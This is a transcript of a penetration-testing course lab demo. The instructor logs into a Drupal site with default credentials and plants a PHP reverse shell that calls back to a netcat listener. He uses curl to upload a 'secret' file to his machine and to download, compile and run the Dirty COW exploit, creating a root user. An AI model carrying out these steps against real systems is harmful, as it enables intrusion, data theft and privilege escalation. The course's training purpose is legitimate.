Transferring Files Demo

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
or

Already have an account? Sign In »

Time
21 hours 43 minutes
Difficulty
Intermediate
CEU/CPE
22
Video Transcription
00:01
Welcome to the file transfer lab demo. You can see I'm in a droop als site here. You can tell that because it's just powered by Drew Apple and also because a little dribble logo here. So sometimes it's as easy as guessing. So I'm going to do admin admin
00:17
and you can see I logged in as admin. Hello admin.
00:22
So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content
00:29
at a basic page.
00:31
I'm going to call this shell dot PHP
00:35
and I'm going to change this to PHP code
00:39
now. I need to figure out what shall I want to use. Well obviously we know it's PHP. You can see this is that said I was telling you about reb shells dot com.
00:48
I've already picked the pen test monkey show. I like this show.
00:52
And what you do is I've just added my I. P address and the port number.
00:56
It actually tells you what to do in your box here for the listener.
00:59
And I've changed my shell from the default been S. H. Two bin bash because I like bash shells better.
01:06
It's gonna copy this. I'm going to paste it here.
01:08
Yeah.
01:10
So what I need to get ready is I need to get a listener ready.
01:14
Net cat
01:15
An LEP 4444.
01:19
And we'll save this
01:23
and
01:26
we see if I hit preview.
01:30
Now I have my shell here. Dub dub, dub data. You can see this is no control job in shell. So let's have one to sue. Route.
01:40
It says must be run from a terminal. So now we know we have what I call a bad shell.
01:46
How do we make this a nicer shell?
01:49
So I told you about python, taxi, import P. T. Y.
01:53
Let's do that.
01:56
But you can see this has been S. H.
01:57
I like bash better but I'll show you what happens if you do Ben Shell.
02:01
So you just get the little dollar sign and not the nicer output.
02:06
You can of course change this
02:07
to bin bash
02:13
and there you go. Now if I wanted to sue route
02:16
now I asked me the password, obviously I don't know the root user's password.
02:21
Not yet.
02:23
So typically I'll go and figure out
02:27
who
02:29
who
02:30
is in here. And I see this Triple Pro which which users are in here I should say remember Cat at sea
02:38
at sea password.
02:40
And I see Drew Apple Pro.
02:43
So I'll change director to Drew People
02:46
Pro.
02:47
And then I'll see what files are in here. And I see this something called secret,
02:52
let's say when I get that file onto my Cali box,
02:57
what I'll do is I'll split my terminal vertically.
03:00
Mhm.
03:04
And I'm gonna use that simply should be put server. I told you I'll show you what it looks like a cat. It
03:13
it's a very small script. But I can now put things onto my Cali box. Whereas if I just did simple HDP server or HTTP server with python three, I can't put things onto my machine.
03:28
So let's do
03:30
python python two
03:34
And it's on 48,000.
03:36
So what I'll do on this size curl tete big t
03:42
secret
03:43
. And then my Cali box 1921681
03:50
228 8000.
03:53
And you can see that. I gotta crow request here.
03:58
And if I check my desktop
04:01
we can x. Out of here. Now
04:04
I see that I get secret
04:06
here.
04:09
So I put that on from from the dribble machine onto my machine with that server.
04:17
Now what I can do
04:21
is I can try to put a file from Cali onto this machine and if I do you name a, I see a kernel version and we'll talk about this morning in colonel exploits
04:34
but I know that this is vulnerable to dirty cow
04:38
as you can see already have dirty cow down here.
04:42
So typically what I do is go to the temp directory because I know it's globally readable, writable and execute Herbal
04:48
and I'll use curl http 1921681228 8000.
04:58
Remember this is on the desktop and dirty cows on the desktop. Dirty
05:02
cow dot c
05:05
output. Dirty
05:08
you can even whatever I want. Dirty see
05:12
and now I see to get requests on the right
05:15
and I see that that was downloaded.
05:18
So if I open this, I said I like to look at the comments.
05:24
It should tell me how to compile it. So I see here G ccP thread dirty. See output. Dirty.
05:32
So I'll try that here
05:42
and um ahmad plus X.
05:46
Dirty
05:49
and then I will
05:53
and our new password
05:57
and you can see it should have overwritten
06:00
the etc. Password file to have this fire fart user
06:05
in it as as the root user.
06:15
So some sometimes you'll notice that um, you may not get an output with these, these colonel exploits. There we go. Now we see something.
06:23
Yeah.
06:25
Great. So now we see that it's done check etc. Pastor to see if the new user was created.
06:30
So now I can do sue. Fire,
06:36
fire fart
06:41
and my password of fire.
06:44
And now we see I am the root user.
06:47
So that gives you some idea of how I both get files. I mean I showed you many examples. This is that was just one was setting up that simple http. Put server. But you saw how I could put files onto my machine.
07:01
You saw how I transferred from a bad shell where I couldn't use su
07:09
to using python and importing P. T. Y.
07:13
And then curling and getting the exploit onto the victim machine and ultimately being able to execute it and becoming the root user, which we'll talk about a lot more in the next module for privilege escalation. So I will see you for that.
Up Next
Offensive Penetration Testing

The Offensive Penetration Testing course opens the doors to those wanting to begin a penetration testing career. This course will prepare learners to begin their pentesting career journey by understanding what tools, techniques, and resources are available for someone starting out in offensive penetration testing.

Instructed By